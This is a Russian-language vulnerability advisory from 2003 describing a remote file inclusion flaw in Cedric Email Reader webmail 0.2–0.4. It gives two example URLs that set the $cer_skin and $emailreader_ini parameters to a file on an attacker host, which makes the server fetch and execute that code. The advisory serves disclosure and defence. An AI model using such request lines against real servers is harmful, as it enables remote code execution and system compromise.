Дата публикации: | 13.02.2003 |
Всего просмотров: | 1259 |
Опасность: | Высокая |
Наличие исправления: | Нет |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Удаленная |
Воздействие: | Компрометация системы |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | Cedric email reader |
Описание: | Уязвимость включения файла обнаружена в программе Cedric Email Reader webmail. Удаленный атакующий может выполнять произвольный код на уязвимом сервере. Файл 'email.php3' (в версии 0.2) или 'email.php' (в версии 0.3) включают '$cer_skin' переменную, но предварительно ее не определяют. В результате удаленный атакующий может создать специально сформированный URL, в котором переменная '$cer_skin' ссылается на удаленно расположенный файл. Этот файл будет выполнен на Web сервере с привилегиями Web сервера. Пример: http://[target]/email.php?login=attacker&cer_skin=http://[attacker]/code.phpТакже в версии 0.4 уязвим сценарий 'webmail/lib/emailreader_execute_on_each_page.inc.php', включающий переменную '$emailreader_ini'. Пример: http://[target]/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://[attacker]/code.phpУязвимость обнаружена в Cedric Email Reader 0.2, 0.3, 0.4 |
Ссылки: | Cedric Email Reader (PHP) |